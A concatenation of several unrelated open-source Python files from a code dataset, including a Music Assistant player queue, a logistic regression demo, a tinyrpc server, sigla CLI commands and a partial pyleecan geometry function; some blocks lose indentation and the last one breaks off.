        """Restore state from db."""
        async with self.mass.database.get_db() as _db:
            for key, val_type in (
                ("repeat_mode", RepeatMode),
                ("crossfade_mode", CrossFadeMode),
                ("shuffle_enabled", bool),
                ("crossfade_duration", int),
                ("volume_normalization_enabled", bool),
                ("volume_normalization_target", float),
            ):
                db_key = f"{self._queue.queue_id}_{key}"
                if db_value := await self.mass.database.get_setting(db_key, db=_db):
                    # NOTE(review): if the stored value is a string,
                    # bool("False") evaluates True - confirm the db value type.
                    value = val_type(db_value["value"])
                    setattr(self, f"_{key}", value)

    def _on_update(self, changed_key: Optional[str] = None) -> None:
        """Handle state changed."""
        self._queue.signal_update()
        self.mass.create_task(self.save(changed_key))
        # TODO: restart play if setting changed that impacts playing queue

    async def save(self, changed_key: Optional[str] = None) -> None:
        """Save state in db."""
        async with self.mass.database.get_db() as _db:
            for key, value in self.to_dict().items():
                if key == changed_key or changed_key is None:
                    db_key = f"{self._queue.queue_id}_{key}"
                    await self.mass.database.set_setting(db_key, value, db=_db)
class PlayerQueue:
"""Represents a PlayerQueue object."""
    def __init__(self, mass: MusicAssistant, player_id: str):
        """Instantiate a PlayerQueue instance."""
        self.mass = mass
        self.logger = mass.players.logger
        # the queue shares its id with the player it is attached to
        self.queue_id = player_id
        self._settings = QueueSettings(self)
        self._current_index: Optional[int] = None
        # index_in_buffer: which track is currently (pre)loaded in the streamer
        self._index_in_buffer: Optional[int] = None
        self._current_item_elapsed_time: int = 0
        self._last_item: Optional[QueueItem] = None
        # start_index: from which index did the queuestream start playing
        self._start_index: int = 0
        self._next_start_index: int = 0
        self._last_state = PlayerState.IDLE
        self._items: List[QueueItem] = []
        self._save_task: Optional[TimerHandle] = None
        # periodic 1s state poller, only running while this queue is playing
        self._update_task: Optional[Task] = None
        self._signal_next: bool = False
        self._last_player_update: int = 0
        self._stream_url: str = ""
    async def setup(self) -> None:
        """Handle async setup of instance."""
        # restore persisted settings and queue items from the database
        await self._settings.restore()
        await self._restore_items()
        self._stream_url: str = self.mass.streams.get_stream_url(
            self.queue_id, content_type=self._settings.stream_type
        )
        # announce the new queue on the event bus
        self.mass.signal_event(
            MassEvent(EventType.QUEUE_ADDED, object_id=self.queue_id, data=self)
        )
    @property
    def settings(self) -> QueueSettings:
        """Return settings/preferences for this PlayerQueue."""
        return self._settings

    @property
    def player(self) -> Player | PlayerGroup:
        """Return the player attached to this queue."""
        return self.mass.players.get_player(self.queue_id, include_unavailable=True)

    @property
    def available(self) -> bool:
        """Return if player(queue) is available."""
        return self.player.available

    @property
    def active(self) -> bool:
        """Return bool if the queue is currently active on the player."""
        if self.player.use_multi_stream:
            # multi-stream urls are per-client; match on the queue id instead
            return self.queue_id in self.player.current_url
        return self._stream_url == self.player.current_url

    @property
    def elapsed_time(self) -> float:
        """Return elapsed time of current playing media in seconds."""
        if not self.active:
            # another source is playing: report the raw player position
            return self.player.elapsed_time
        return self._current_item_elapsed_time

    @property
    def max_sample_rate(self) -> int:
        """Return the maximum samplerate supported by this queue(player)."""
        return max(self.player.supported_sample_rates)

    @property
    def items(self) -> List[QueueItem]:
        """Return all items in this queue."""
        return self._items

    @property
    def current_index(self) -> int | None:
        """Return current index."""
        return self._current_index
@property
def current_item(self) -> QueueItem | None:
"""
Return the current item in the queue.
Returns None if queue is empty.
"""
if self._current_index is None:
return None
if self._current_index >= len(self._items):
return None
return self._items[self._current_index]
@property
def next_item(self) -> QueueItem | None:
"""
Return the next item in the queue.
Returns None if queue is empty or no more items.
"""
if next_index := self.get_next_index(self._current_index):
return self._items[next_index]
return None
def get_item(self, index: int) -> QueueItem | None:
"""Get queue item by index."""
if index is not None and len(self._items) > index:
return self._items[index]
return None
def item_by_id(self, queue_item_id: str) -> QueueItem | None:
"""Get item by queue_item_id from queue."""
if not queue_item_id:
return None
return next((x for x in self.items if x.item_id == queue_item_id), None)
def index_by_id(self, queue_item_id: str) -> Optional[int]:
"""Get index by queue_item_id."""
for index, item in enumerate(self.items):
if item.item_id == queue_item_id:
return index
return None
    async def play_media(
        self,
        uris: str | List[str],
        queue_opt: QueueOption = QueueOption.PLAY,
        passive: bool = False,
    ) -> str:
        """
        Play media item(s) on this queue.

        :param uris: uri(s) that should be played (single item or list of uri's).
        :param queue_opt:
            QueueOption.PLAY -> Insert new items in queue and start playing at inserted position
            QueueOption.REPLACE -> Replace queue contents with these items
            QueueOption.NEXT -> Play item(s) after current playing item
            QueueOption.ADD -> Append new items at end of the queue
        :param passive: do not actually start playback.

        Returns: the stream URL for this queue.
        """
        # a single item or list of items may be provided
        if not isinstance(uris, list):
            uris = [uris]
        queue_items = []
        for uri in uris:
            # parse provided uri into a MA MediaItem or Basis QueueItem from URL
            try:
                media_item = await self.mass.music.get_item_by_uri(uri)
            except MediaNotFoundError as err:
                if uri.startswith("http"):
                    # a plain url was provided
                    queue_items.append(QueueItem(uri))
                    continue
                raise MediaNotFoundError(f"Invalid uri: {uri}") from err

            # collect tracks to play: containers (artist/album/playlist)
            # expand into their individual tracks
            if media_item.media_type == MediaType.ARTIST:
                tracks = await self.mass.music.artists.toptracks(
                    media_item.item_id, provider=media_item.provider
                )
            elif media_item.media_type == MediaType.ALBUM:
                tracks = await self.mass.music.albums.tracks(
                    media_item.item_id, provider=media_item.provider
                )
            elif media_item.media_type == MediaType.PLAYLIST:
                tracks = await self.mass.music.playlists.tracks(
                    media_item.item_id, provider=media_item.provider
                )
            elif media_item.media_type == MediaType.RADIO:
                # single radio
                tracks = [
                    await self.mass.music.radio.get(
                        media_item.item_id, provider=media_item.provider
                    )
                ]
            else:
                # single track
                tracks = [
                    await self.mass.music.tracks.get(
                        media_item.item_id, provider=media_item.provider
                    )
                ]
            for track in tracks:
                if not track.available:
                    continue
                queue_items.append(QueueItem.from_media_item(track))

        # load items into the queue
        if queue_opt == QueueOption.REPLACE:
            await self.load(queue_items, passive=passive)
        elif (
            # large batches are loaded as a full replace rather than inserted
            queue_opt in [QueueOption.PLAY, QueueOption.NEXT] and len(queue_items) > 100
        ):
            await self.load(queue_items, passive=passive)
        elif queue_opt == QueueOption.NEXT:
            await self.insert(queue_items, 1, passive=passive)
        elif queue_opt == QueueOption.PLAY:
            await self.insert(queue_items, 0, passive=passive)
        elif queue_opt == QueueOption.ADD:
            await self.append(queue_items)
        return self._stream_url
    async def stop(self) -> None:
        """Stop command on queue player."""
        # redirect to underlying player
        await self.player.stop()

    async def play(self) -> None:
        """Play (unpause) command on queue player."""
        if self.active and self.player.state == PlayerState.PAUSED:
            await self.player.play()
        else:
            # queue not active (or not paused): (re)start it instead
            await self.resume()

    async def pause(self) -> None:
        """Pause command on queue player."""
        # redirect to underlying player
        await self.player.pause()

    async def play_pause(self) -> None:
        """Toggle play/pause on queue/player."""
        if self.player.state == PlayerState.PLAYING:
            await self.pause()
            return
        await self.play()

    async def next(self) -> None:
        """Play the next track in the queue."""
        next_index = self.get_next_index(self._current_index)
        if next_index is None:
            # end of queue / nothing to advance to
            return None
        await self.play_index(next_index)

    async def previous(self) -> None:
        """Play the previous track in the queue."""
        if self._current_index is None:
            return
        # clamp at the first track
        await self.play_index(max(self._current_index - 1, 0))

    async def resume(self) -> None:
        """Resume previous queue."""
        # TODO: Support skipping to last known position
        if self._items:
            prev_index = self._current_index
            await self.play_index(prev_index)
        else:
            self.logger.warning(
                "resume queue requested for %s but queue is empty", self.queue_id
            )
    async def play_index(self, index: Union[int, str], passive: bool = False) -> None:
        """Play item at index (or item_id) X in queue.

        :param index: queue position (int) or queue_item_id (str) to start at.
        :param passive: prepare the stream but do not instruct the player to play.
        :raises FileNotFoundError: when an unknown item_id was given.
        """
        # power on player when requesting play
        if not self.player.powered:
            await self.player.power(True)
        if self.player.use_multi_stream:
            # tear down any running multi-client stream before restarting
            await self.mass.streams.stop_multi_client_queue_stream(self.queue_id)
        if not isinstance(index, int):
            index = self.index_by_id(index)
        if index is None:
            raise FileNotFoundError(f"Unknown index/id: {index}")
        if not len(self.items) > index:
            # index beyond queue end: nothing to play
            return
        self._current_index = index
        self._next_start_index = index
        # send stream url to player connected to this queue
        self._stream_url = self.mass.streams.get_stream_url(
            self.queue_id, content_type=self._settings.stream_type
        )
        if self.player.use_multi_stream:
            # multi stream enabled, all child players should receive the same audio stream
            # redirect command to all (powered) players
            # TODO: this assumes that all client players support flac
            content_type = ContentType.FLAC
            coros = []
            expected_clients = set()
            for child_id in self.player.group_childs:
                if child_player := self.mass.players.get_player(child_id):
                    if child_player.powered:
                        # TODO: this assumes that all client players support flac
                        player_url = self.mass.streams.get_stream_url(
                            self.queue_id, child_id, content_type
                        )
                        expected_clients.add(child_id)
                        coros.append(child_player.play_url(player_url))
            await self.mass.streams.start_multi_client_queue_stream(
                # TODO: this assumes that all client players support flac
                self.queue_id,
                expected_clients,
                content_type,
            )
            await asyncio.gather(*coros)
        elif not passive:
            # regular (single player) request
            await self.player.play_url(self._stream_url)
    async def move_item(self, queue_item_id: str, pos_shift: int = 1) -> None:
        """
        Move queue item x up/down the queue.

        param pos_shift: move item x positions down if positive value
                         move item x positions up if negative value
                         move item to top of queue as next item if 0
        """
        items = self._items.copy()
        item_index = self.index_by_id(queue_item_id)
        if pos_shift == 0 and self.player.state == PlayerState.PLAYING:
            # "play next": slot the item right after the playing track
            new_index = self._current_index + 1
        elif pos_shift == 0:
            new_index = self._current_index
        else:
            new_index = item_index + pos_shift
        if (new_index < self._current_index) or (new_index > len(self.items)):
            # never move an item into the already-played part or past the end
            return
        # move the item in the list
        # NOTE(review): when moving downwards, pop() shifts later indices left
        # by one so insert() lands one position before new_index - confirm
        # this off-by-one is intended.
        items.insert(new_index, items.pop(item_index))
        await self.update(items)
async def delete_item(self, queue_item_id: str) -> None:
"""Delete item (by id or index) from the queue."""
item_index = self.index_by_id(queue_item_id)
if item_index <= self._index_in_buffer:
# ignore request if track already loaded in the buffer
# the frontend should guard so this is just in case
return
self._items.pop(item_index)
self.signal_update(True)
    async def load(self, queue_items: List[QueueItem], passive: bool = False) -> None:
        """Load (overwrite) queue with new items."""
        # remember the original order so unshuffle can restore it
        for index, item in enumerate(queue_items):
            item.sort_index = index
        if self.settings.shuffle_enabled and len(queue_items) > 5:
            queue_items = random.sample(queue_items, len(queue_items))
        self._items = queue_items
        await self.play_index(0, passive=passive)
        self.signal_update(True)

    async def insert(
        self, queue_items: List[QueueItem], offset: int = 0, passive: bool = False
    ) -> None:
        """
        Insert new items at offset x from current position.

        Keeps remaining items in queue.
        if offset 0, will start playing newly added item(s)

        :param queue_items: a list of QueueItem
        :param offset: offset from current queue position
        """
        if not self.items or self._current_index is None:
            # nothing playing yet: behave like a full load
            return await self.load(queue_items)
        insert_at_index = self._current_index + offset
        for index, item in enumerate(queue_items):
            item.sort_index = insert_at_index + index
        if self.settings.shuffle_enabled and len(queue_items) > 5:
            queue_items = random.sample(queue_items, len(queue_items))
        if offset == 0:
            # replace current item with new
            self._items = (
                self._items[:insert_at_index]
                + queue_items
                + self._items[insert_at_index + 1 :]
            )
        else:
            self._items = (
                self._items[:insert_at_index]
                + queue_items
                + self._items[insert_at_index:]
            )
        if offset in (0, self._index_in_buffer):
            # inserted at the playing/buffered position: (re)start there
            await self.play_index(insert_at_index, passive=passive)
        self.signal_update(True)

    async def append(self, queue_items: List[QueueItem]) -> None:
        """Append new items at the end of the queue."""
        for index, item in enumerate(queue_items):
            item.sort_index = len(self.items) + index
        if self.settings.shuffle_enabled:
            # re-shuffle the upcoming part together with the new items
            played_items = self.items[: self._current_index]
            next_items = self.items[self._current_index + 1 :] + queue_items
            next_items = random.sample(next_items, len(next_items))
            items = played_items + [self.current_item] + next_items
            await self.update(items)
            return
        self._items = self._items + queue_items
        self.signal_update(True)

    async def update(self, queue_items: List[QueueItem]) -> None:
        """Update the existing queue items, mostly caused by reordering."""
        self._items = queue_items
        self.signal_update(True)

    async def clear(self) -> None:
        """Clear all items in the queue."""
        if self.player.state not in (PlayerState.IDLE, PlayerState.OFF):
            # stop playback before emptying the queue
            await self.stop()
        await self.update([])
    def on_player_update(self) -> None:
        """Call when player updates."""
        if self._last_state != self.player.state:
            self._last_state = self.player.state
            # always signal update if playback state changed
            self.signal_update()
            # handle case where stream stopped on purpose and we need to restart it
            if self.player.state != PlayerState.PLAYING and self._signal_next:
                self._signal_next = False
                self.mass.create_task(self.resume())

            # start poll/updater task if playback starts on player
            async def updater() -> None:
                """Update player queue every second while playing."""
                while True:
                    await asyncio.sleep(1)
                    self.update_state()

            if self.player.state == PlayerState.PLAYING and self.active:
                if not self._update_task or self._update_task.done():
                    # NOTE(review): the coroutine *function* (not a coroutine
                    # object) is handed over here - presumably
                    # MusicAssistant.create_task accepts callables; confirm.
                    self._update_task = self.mass.create_task(updater)
            elif self._update_task:
                # playback stopped: cancel the 1s poller
                self._update_task.cancel()
                self._update_task = None
        self.update_state()
def update_state(self) -> None:
    """Update queue details, called when player updates."""
    if self.player.active_queue.queue_id != self.queue_id:
        # a different queue is active on this player; nothing to do here
        return
    new_index = self._current_index
    track_time = self._current_item_elapsed_time
    new_item_loaded = False
    # if self.player.state == PlayerState.PLAYING:
    if self.player.state == PlayerState.PLAYING and self.player.elapsed_time > 0:
        # derive queue index + in-track time from the continuous stream position
        new_index, track_time = self.__get_queue_stream_index()
    # process new index
    if self._current_index != new_index:
        # queue track updated
        self._current_index = new_index
        # check if a new track is loaded, wait for the streamdetails
        if (
            self.current_item
            and self._last_item != self.current_item
            and self.current_item.streamdetails
        ):
            # new active item in queue
            new_item_loaded = True
            # invalidate previous streamdetails
            if self._last_item:
                self._last_item.streamdetails = None
            self._last_item = self.current_item
    # update vars and signal update on eventbus if needed
    prev_item_time = int(self._current_item_elapsed_time)
    self._current_item_elapsed_time = int(track_time)

    if new_item_loaded:
        self.signal_update()
    if abs(prev_item_time - self._current_item_elapsed_time) >= 1:
        # only fire the time event on whole-second changes
        self.mass.signal_event(
            MassEvent(
                EventType.QUEUE_TIME_UPDATED,
                object_id=self.queue_id,
                data=int(self.elapsed_time),
            )
        )
async def queue_stream_prepare(self) -> StreamDetails:
    """Call when queue_streamer is about to start playing.

    Resolves the stream details for the next scheduled queue item.

    :raises QueueEmpty: when there is no item at the next start index.
    :raises MediaNotFoundError: re-raised after scheduling a skip when the
        media for the next item cannot be resolved.
    """
    start_from_index = self._next_start_index
    try:
        next_item = self._items[start_from_index]
    except (IndexError, TypeError) as err:
        # index out of range or _next_start_index is None
        raise QueueEmpty() from err
    try:
        return await get_stream_details(self.mass, next_item, self.queue_id)
    except MediaNotFoundError as err:
        # something bad happened, try to recover by requesting the next track in the queue
        await self.play_index(self._current_index + 2)
        raise err
async def queue_stream_start(self) -> int:
    """Call when queue_streamer starts playing the queue stream.

    Resets the progress bookkeeping and returns the index the stream
    starts playing from.
    """
    start_from_index = self._next_start_index
    self._current_item_elapsed_time = 0
    self._current_index = start_from_index
    self._start_index = start_from_index
    # pre-compute where the streamer should continue after this item
    self._next_start_index = self.get_next_index(start_from_index)
    self._index_in_buffer = start_from_index
    return start_from_index
async def queue_stream_next(self, cur_index: int) -> int | None:
    """Call when queue_streamer loads next track in buffer.

    :param cur_index: index currently playing (unused here; kept for the
        streamer's call signature).
    :return: the index now buffered, or None when the queue is exhausted.
    """
    next_idx = self._next_start_index
    self._index_in_buffer = next_idx
    self._next_start_index = self.get_next_index(self._next_start_index)
    return next_idx
def get_next_index(self, index: int) -> int | None:
"""Return the next index or None if no more items."""
if not self._items or index is None:
# queue is empty
return None
if self.settings.repeat_mode == RepeatMode.ONE:
return index
if len(self._items) > (index + 1):
return index + 1
if self.settings.repeat_mode == RepeatMode.ALL:
# repeat enabled, start queue at beginning
return 0
return None
async def queue_stream_signal_next(self):
    """Indicate that queue stream needs to start next index once playback finished."""
    # picked up by on_player_update, which restarts playback via resume()
    self._signal_next = True
def signal_update(self, items_changed: bool = False) -> None:
    """Signal state changed of this queue.

    :param items_changed: when True, also persist the items to cache and
        emit QUEUE_ITEMS_UPDATED instead of the plain QUEUE_UPDATED event.
    """
    if not items_changed:
        self.mass.signal_event(
            MassEvent(EventType.QUEUE_UPDATED, object_id=self.queue_id, data=self)
        )
        return
    # persist the changed items in the background, then notify listeners
    self.mass.create_task(self._save_items())
    self.mass.signal_event(
        MassEvent(
            EventType.QUEUE_ITEMS_UPDATED, object_id=self.queue_id, data=self
        )
    )
def to_dict(self) -> Dict[str, Any]:
    """Export object to dict (JSON-serializable snapshot of this queue)."""
    snapshot = {
        "queue_id": self.queue_id,
        "player": self.player.player_id,
        "name": self.player.name,
        "active": self.active,
        "elapsed_time": int(self.elapsed_time),
        "state": self.player.state.value,
        "available": self.player.available,
        "current_index": self.current_index,
        "current_item": None,
        "next_item": None,
        "settings": self.settings.to_dict(),
    }
    # serialize the current/next items only when they exist
    if self.current_item:
        snapshot["current_item"] = self.current_item.to_dict()
    if self.next_item:
        snapshot["next_item"] = self.next_item.to_dict()
    return snapshot
def __get_queue_stream_index(self) -> Tuple[int, int]:
    """Calculate current queue index and current track elapsed time.

    The player reports elapsed time for the continuous queue stream as a
    whole, so walk the items from the last start position, subtracting
    track durations until the reported position falls inside a track.

    :return: (queue index, seconds elapsed within that track).
    """
    # player is playing a constant stream so we need to do this the hard way
    queue_index = 0
    elapsed_time_queue = self.player.elapsed_time
    total_time = 0
    track_time = 0
    if self._items and len(self._items) > self._start_index:
        # start_index: holds the last starting position
        queue_index = self._start_index
        queue_track = None
        while len(self._items) > queue_index:
            queue_track = self._items[queue_index]
            if queue_track.duration is None:
                # in case of a radio stream: substitute a 24h duration
                # NOTE(review): this mutates the queue item in place
                queue_track.duration = 86400
            if elapsed_time_queue > (queue_track.duration + total_time):
                # position lies beyond this track; advance to the next one
                total_time += queue_track.duration
                queue_index += 1
            else:
                # position falls inside this track
                track_time = elapsed_time_queue - total_time
                break
    return queue_index, track_time
async def _restore_items(self) -> None:
    """Try to load the saved state from cache."""
    if queue_cache := await self.mass.cache.get(f"queue_items.{self.queue_id}"):
        try:
            self._items = [QueueItem.from_dict(x) for x in queue_cache["items"]]
            self._current_index = queue_cache["current_index"]
        except (KeyError, AttributeError, TypeError) as err:
            # corrupt or outdated cache entry: log and keep the empty queue
            self.logger.warning(
                "Unable to restore queue state for queue %s",
                self.queue_id,
                exc_info=err,
            )
    # restore the persisted queue settings as well
    await self.settings.restore()
async def _save_items(self) -> None:
    """Save current queue items/state in cache."""
    # stored under a per-queue key; restored on startup by _restore_items
    await self.mass.cache.set(
        f"queue_items.{self.queue_id}",
        {
            "items": [x.to_dict() for x in self._items],
            "current_index": self._current_index,
        },
    )
| 2.046875 | 2 |
python/demos/logregDemoAffair.py | qyxiao/pmt | 0 | 12760344 | #logistic regression demo on female extra marital affair dataset
# Logistic regression demo on the female extramarital affair dataset.
# Ported to Python 3: print() calls replace the Python 2 print statements,
# and sklearn.model_selection replaces the removed sklearn.cross_validation.
# https://github.com/justmarkham/gadsdc1/blob/master/logistic_assignment/kevin_logistic_sklearn.ipynb
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import statsmodels.api as sm
from patsy import dmatrices
from sklearn.linear_model import LogisticRegression
# NOTE: sklearn.cross_validation was removed in scikit-learn 0.20;
# the same helpers now live in sklearn.model_selection.
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn import metrics

# load dataset of survey answers (the `affairs` column measures time
# spent in extramarital affairs)
data = sm.datasets.fair.load_pandas().data

# add "affair" column: 1 represents having affairs, 0 represents not
data['affair'] = (data.affairs > 0).astype(int)

# create dataframes with an intercept column and dummy variables for
# occupation and occupation_husb
# We use the patsy package to create the design matrix
# http://patsy.readthedocs.org/en/latest/overview.html
# This encodes categorical variables by dropping the first level
y, X = dmatrices('affair ~ rate_marriage + age + yrs_married + children + \
                  religious + educ + C(occupation) + C(occupation_husb)',
                 data, return_type="dataframe")

# fix column names of X (patsy's generated dummy names are unwieldy)
X = X.rename(columns = {'C(occupation)[T.2.0]':'occ_2',
                        'C(occupation)[T.3.0]':'occ_3',
                        'C(occupation)[T.4.0]':'occ_4',
                        'C(occupation)[T.5.0]':'occ_5',
                        'C(occupation)[T.6.0]':'occ_6',
                        'C(occupation_husb)[T.2.0]':'occ_husb_2',
                        'C(occupation_husb)[T.3.0]':'occ_husb_3',
                        'C(occupation_husb)[T.4.0]':'occ_husb_4',
                        'C(occupation_husb)[T.5.0]':'occ_husb_5',
                        'C(occupation_husb)[T.6.0]':'occ_husb_6'})

# flatten y into a 1-D array (sklearn expects a vector of labels)
y = np.ravel(y)

# split data into train and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)

# instantiate a logistic regression model, and fit with X and y
model = LogisticRegression()
model = model.fit(X_train, y_train)

# examine the coefficients next to their feature names
# (zip must be materialized under Python 3; print so the demo shows the table)
coef = np.ravel(model.coef_)
coef_round = [round(c, 2) for c in coef]
print(pd.DataFrame(list(zip(X.columns, np.transpose(coef_round)))))

# predictions on test set
predicted = model.predict(X_test)
probs = model.predict_proba(X_test)

# check the accuracy (baseline = always predicting the majority class)
print('baseline accuracy = {0}'.format(1 - y.mean()))
print('accuracy on test set = {0}'.format(metrics.accuracy_score(y_test, predicted)))
print('auc on test set = {0}'.format(metrics.roc_auc_score(y_test, probs[:, 1])))
print('class confusion matrix')
print(metrics.confusion_matrix(y_test, predicted))
| 3.140625 | 3 |
main.py | leofansq/Tools_make_planes | 8 | 12760345 | <gh_stars>1-10
import make_planes as mp

# Entry-point script: convert the dataset's 4-channel lidar points to
# 3-channel points, then estimate ground planes from them.

# Path of the dataset, for KITTI is "/home/xxxxx/KITTI/training/"
DATA_FILE_PATH = "./training/"

print ("Start", DATA_FILE_PATH)

# lidar4to3(input_file_path, output_file_path="./points/")
mp.lidar4to3(DATA_FILE_PATH)

# cal_planes(input_file_path="./points/", output_file_path="./planes/")
mp.cal_planes()
tworaven_apps/data_prep_utils/static_vals.py | TwoRavens/TwoRavens | 20 | 12760346 |
# Identifier for the Datamart augment workflow.
DATAMART_AUGMENT_PROCESS = 'DATAMART_AUGMENT_PROCESS'

# ----------------------------------------------
# Related to the "Add User Dataset" process
# ----------------------------------------------
ADD_USER_DATASET_PROCESS = 'ADD_USER_DATASET_PROCESS'
ADD_USER_DATASET_PROCESS_NO_WORKSPACE = 'ADD_USER_DATASET_PROCESS_NO_WORKSPACE'
# Key holding the path to the freshly written dataset doc.
NEW_DATASET_DOC_PATH = 'new_dataset_doc_path'
DATASET_NAME_FROM_UI = 'name' # from dataset.js
DATASET_NAME = 'dataset_name' # from dataset.js
SKIP_CREATE_NEW_CONFIG = 'SKIP_CREATE_NEW_CONFIG'

# ----------------------------------------------
# File extensions accepted for uploaded datasets
# ----------------------------------------------
EXT_CSV = '.csv'
EXT_TAB = '.tab'
EXT_TSV = '.tsv'
EXT_XLS = '.xls'
EXT_XLSX = '.xlsx'

VALID_EXTENSIONS = (EXT_CSV,
                    EXT_TAB, EXT_TSV,
                    EXT_XLS, EXT_XLSX)

# ----------------------------------------------
# For creating a datasetDoc
# ----------------------------------------------
DATASET_SCHEMA_VERSION = '4.0.0' # create a datasetDoc
PROBLEM_SCHEMA_VERSION = '4.0.0'

# Map Pandas dtypes to the column types used in the datasetDoc.
# mapping from: https://pbpython.com/pandas_dtypes.html
# -> https://gitlab.datadrivendiscovery.org/MIT-LL/d3m_data_supply/blob/shared/schemas/datasetSchema.json
DTYPES = {
    'int64': 'integer',
    'float64': 'real',
    'bool': 'boolean',
    'object': 'string',
    'datetime64': 'dateTime',
    'category': 'categorical'
}
tinyrpc/server/__init__.py | joydenfew/python3-tinyrpc | 0 | 12760347 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# FIXME: needs unittests
# FIXME: needs checks for out-of-order, concurrency, etc as attributes
from tinyrpc.exc import RPCError
class RPCServer(object):
    """Basic RPC server tying together a transport, a protocol and a dispatcher.

    :param transport: The :py:class:`~tinyrpc.transports.RPCTransport` to use.
    :param protocol: The :py:class:`~tinyrpc.RPCProtocol` to use.
    :param dispatcher: The :py:class:`~tinyrpc.dispatch.RPCDispatcher` to use.
    """

    trace = None
    """Optional hook for tracing incoming and outgoing messages.

    When set to a callable it is invoked right after a message is received
    and right before a reply is sent.  The callable receives three
    positional arguments:

    * *direction*: string, ``'-->'`` for incoming, ``'<--'`` for outgoing data.
    * *context*: the context returned by :py:meth:`~tinyrpc.transport.RPCTransport.receive_message`.
    * *message*: the raw message string itself.

    Example::

        def my_trace(direction, context, message):
            logger.debug('%s%s', direction, message)

        server = RPCServer(transport, protocol, dispatcher)
        server.trace = my_trace
        server.serve_forever

    logs all incoming and outgoing traffic of the RPC service.
    """

    def __init__(self, transport, protocol, dispatcher):
        self.transport = transport
        self.protocol = protocol
        self.dispatcher = dispatcher
        self.trace = None

    def serve_forever(self):
        """Process incoming requests in an endless loop.

        Repeatedly calls :py:meth:`receive_one_message` to handle the next
        incoming request.
        """
        while True:
            self.receive_one_message()

    def receive_one_message(self):
        """Receive and dispatch a single request.

        Blocks on the transport until a message arrives, then hands a
        handler function to :py:meth:`_spawn`.  The handler decodes the
        message with the protocol (replying with an error response when
        decoding fails), asks the dispatcher to handle the resulting
        request, and — unless the response is ``None`` — serializes the
        response and sends it back to the client over the transport.
        """
        context, message = self.transport.receive_message()
        if callable(self.trace):
            self.trace('-->', context, message)

        # The protocol is assumed thread-safe, and the dispatcher
        # thread-safe as long as it is not mutated concurrently.
        def handle_message(context, message):
            try:
                request = self.protocol.parse_request(message)
            except RPCError as e:
                response = e.error_respond()
            else:
                response = self.dispatcher.dispatch(
                    request,
                    getattr(self.protocol, '_caller', None)
                )

            # send reply (None means a notification: no reply expected)
            if response is not None:
                serialized = response.serialize()
                if callable(self.trace):
                    self.trace('<--', context, serialized)
                self.transport.send_reply(context, serialized)

        self._spawn(handle_message, context, message)

    def _spawn(self, func, *args, **kwargs):
        """Run a handler function.

        Subclasses override this to add concurrency; the base class simply
        invokes ``func(*args, **kwargs)`` synchronously, which yields a
        single-threaded, single-process server.

        :param func: A callable to call.
        :param args: Arguments to ``func``.
        :param kwargs: Keyword arguments to ``func``.
        """
        func(*args, **kwargs)
| 2.6875 | 3 |
sigla/cli/commands.py | mintyPT/sigla | 7 | 12760348 | <gh_stars>1-10
from pathlib import Path
import typer
from sigla import __version__, config
from sigla.cli.actions import Action, NewDefinitionFile, NewFiltersFile
from sigla.main import process
from sigla.utils.errors import TemplateDoesNotExistError
from sigla.utils.helpers import ensure_dirs
class VersionCommand(Action):
    """Print the installed sigla package version."""

    def run(self):
        # __version__ is imported at module level from the sigla package
        self.log(f"Version: {__version__}")
class RunCommand(Action):
    """Render every definition file matched by the given references.

    Each reference is expanded as a ``<reference>.xml`` glob inside the
    configured definitions directory; every matched file is read and fed
    to :func:`sigla.main.process`.
    """

    def __init__(self, references):
        self.references = references
        # One glob generator per reference, rooted at the definitions dir.
        self.globs = [
            Path(config.path.definitions).glob(f"{reference}.xml")
            for reference in references
        ]
        # Flattened list of every path matched by any reference.
        self.matches = [match for glob in self.globs for match in glob]

    @staticmethod
    def handle_definition_file_match(match):
        """Read one definition file and process its XML content.

        Directories are silently skipped; a vanished path aborts the CLI.
        """
        if not match.exists():
            raise typer.Exit(f"✋ The definition(s) do not exists {match}")

        if match.is_dir():
            return

        print(f":: Reading {match}")
        str_xml = match.read_text()
        process("xml", str_xml, factory=None)

    def run(self):
        """Process all matched definition files, warning when none matched."""
        if len(self.matches) == 0:
            # NOTE: a previous try/except wrapped this print() to catch
            # TemplateDoesNotExistError, but print() can never raise it —
            # that handler was dead code and has been removed.
            print(f"✋ No definition(s) found for {self.references}")

        for match in self.matches:
            self.handle_definition_file_match(match)
class NewCommand(Action):
    """Create a new definition file with the given name."""

    def __init__(self, name) -> None:
        super().__init__()
        self.name = name

    def run(self):
        # Delegate file creation to the NewDefinitionFile action,
        # rooted at the configured definitions directory.
        cmd = NewDefinitionFile(config.path.definitions, self.name)
        cmd.run()
class InitCommand(Action):
    """Bootstrap a sigla project: create the folder layout and filters file."""

    def run(self):
        self.log("sigla init")
        # Create every directory sigla expects to exist.
        self.create_folder(
            config.path.templates,
            config.path.snapshots,
            config.path.definitions,
            config.path.scripts,
        )
        self.create_filters()

    def create_filters(self):
        """Create the filters file at the project root if it is missing."""
        self.log(f"- checking/creating file {config.path.filters}")
        cmd = NewFiltersFile(
            config.path.root_directory, config.path.filters_filename
        )
        cmd.run()

    def create_folder(self, *args):
        """Create each given folder (and any missing parents)."""
        for path in args:
            self.log(f"- creating folder {path}")
            ensure_dirs(path)
| 1.992188 | 2 |
pyleecan/Methods/Slot/HoleMLSRPM/comp_surface_magnets.py | carbon-drive/pyleecan | 1 | 12760349 | # -*- coding: utf-8 -*-
from numpy import exp, arcsin, tan, cos, sqrt, sin
def comp_surface(self):
    """Compute the surface of the magnet of the Hole.

    The magnet cross-section is approximated by the polygon Z1..Z10,
    where Z6..Z10 are the mirror images of Z5..Z1 about the x-axis;
    the area is then evaluated with the shoelace formula.

    Parameters
    ----------
    self : HoleMLSRPM
        A HoleMLSRPM object

    Returns
    -------
    S: float
        Surface of the Magnet. [m**2]
    """

    Rbo = self.get_Rbo()

    # Z1: point on the circle of radius R3, rotated alpha1 below the x-axis
    delta1 = arcsin((self.R1 + self.W2) / (self.R1 + self.R3))
    alpha1 = self.W1 - delta1
    Z1 = self.R3 * exp(-1j * alpha1)
    x1 = Z1.real
    y1 = Z1.imag
    # Zc1: center of the fillet arc of radius R1 adjacent to Z1
    # NOTE(review): Zc1 itself is unused below; only xc1/yc1 are used.
    Zc1 = (self.R3 + self.R1) * exp(-1j * alpha1)
    xc1 = (self.R3 + self.R1) * cos(alpha1)
    yc1 = -(self.R3 + self.R1) * sin(alpha1)
